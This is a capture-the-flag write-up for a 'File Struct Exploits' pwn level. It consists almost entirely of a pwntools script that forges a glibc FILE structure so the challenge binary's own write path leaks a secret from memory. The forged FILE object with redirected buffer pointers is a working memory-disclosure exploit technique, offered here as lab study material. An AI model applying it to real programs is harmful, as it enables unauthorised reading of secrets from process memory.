
(File Struct Exploits) level 11

(File Struct Exploits) level 11

Information

  • category: pwn

Description

Apply FILE struct exploits to leak a secret value.

Exploit

from pwn import *

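# The challenge binary; setting context.binary also fixes arch/bits for pwntools.
elf = context.binary = ELF("/challenge/babyfile_level11")
# Module-level process handle shared by every menu helper below.
# (A `global` statement at module scope is a no-op, so it was dropped.)
p = elf.process()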

def new_note(size):
    """Pick ``new_note`` at the menu prompt, then send *size* as-is (no newline appended)."""
    prompt, choice = b"> ", b"new_note"
    p.sendlineafter(prompt, choice)
    p.send(size)

def del_note():
    """Pick ``del_note`` at the menu prompt."""
    choice = b"del_note"
    p.sendlineafter(b"> ", choice)

def write_note(data):
    """Pick ``write_note`` at the menu prompt, then send *data* raw (caller adds any newline)."""
    prompt = b"> "
    p.sendlineafter(prompt, b"write_note")
    p.send(data)

def read_note():
    """Pick ``read_note`` at the menu prompt; output is left for the caller to consume."""
    choice = b"read_note"
    p.sendlineafter(b"> ", choice)

def open_file():
    """Pick ``open_file`` at the menu prompt."""
    prompt = b"> "
    p.sendlineafter(prompt, b"open_file")

def close_file():
    """Pick ``close_file`` at the menu prompt."""
    choice = b"close_file"
    p.sendlineafter(b"> ", choice)

def write_file():
    """Pick ``write_file`` at the menu prompt (triggers the program's stdio write path)."""
    prompt = b"> "
    p.sendlineafter(prompt, b"write_file")

def write_fp(data):
    """Pick ``write_fp`` at the menu prompt, then send *data* raw as the new FILE contents."""
    prompt, choice = b"> ", b"write_fp"
    p.sendlineafter(prompt, choice)
    p.send(data)

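def quit():
    """Pick ``quit`` at the menu prompt.

    Fixed: ``sendlineafter`` takes the delimiter first and the payload
    second; the original passed only ``b"quit"`` and would raise TypeError
    if ever called. The name shadows the ``quit`` builtin; it is kept
    because it is part of this script's helper set.
    """
    p.sendlineafter(b"> ", b"quit")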

def exploit() -> None:
    """Drive the menu so the program's own stdio write path prints the secret.

    The challenge prints the address where the secret lives; that address is
    installed as the output buffer of a forged FILE object, so the following
    ``write_file`` flushes the bytes at that address to fd 1 (stdout) instead
    of real file data.

    Defensive takeaway: glibc validates FILE vtables but not the buffer
    pointers, so any code path that lets user-controlled bytes overwrite a
    live FILE object (here, presumably ``write_fp``) is a memory-disclosure
    primitive; the struct must be treated as trusted, non-writable state.
    """
    p.recvuntil(b"located at ")
    # Despite the name, this holds the secret's *address* (hex), not its contents.
    flag = int(p.recvline()[:-1],16)

    # Note setup precedes open_file; the reason is not visible from this
    # script (the challenge's expected sequence) -- verify against the binary.
    new_note(b"50")
    write_note(b"AAAA")
    read_note()

    open_file()
    
    fp = FileStructure() 
    # 0x800 is glibc's _IO_IS_APPENDING bit: with it set, the flush does not
    # seek before writing (confirm against the target libc version).
    fp.flags = 0x800
    fp._IO_read_end = flag
    # Pending-output window [write_base, write_ptr): 0x64 bytes starting at the secret.
    fp._IO_write_base = flag
    fp._IO_write_ptr = flag + 0x64
    # Flush destination is stdout.
    fp.fileno = 1

    # Serialise only the fields up to _flags2; later fields keep pwntools defaults.
    write_fp(bytes(fp.struntil("_flags2"))) # or just fp.write(flag,100)
    write_file()

    p.interactive()

def main():
    """Script entry point: run the exploit sequence against the spawned process."""
    return exploit()

if __name__ == "__main__":
    # Run only when executed directly, not when the helpers are imported.
    main()
This post is licensed under CC BY 4.0 by the author.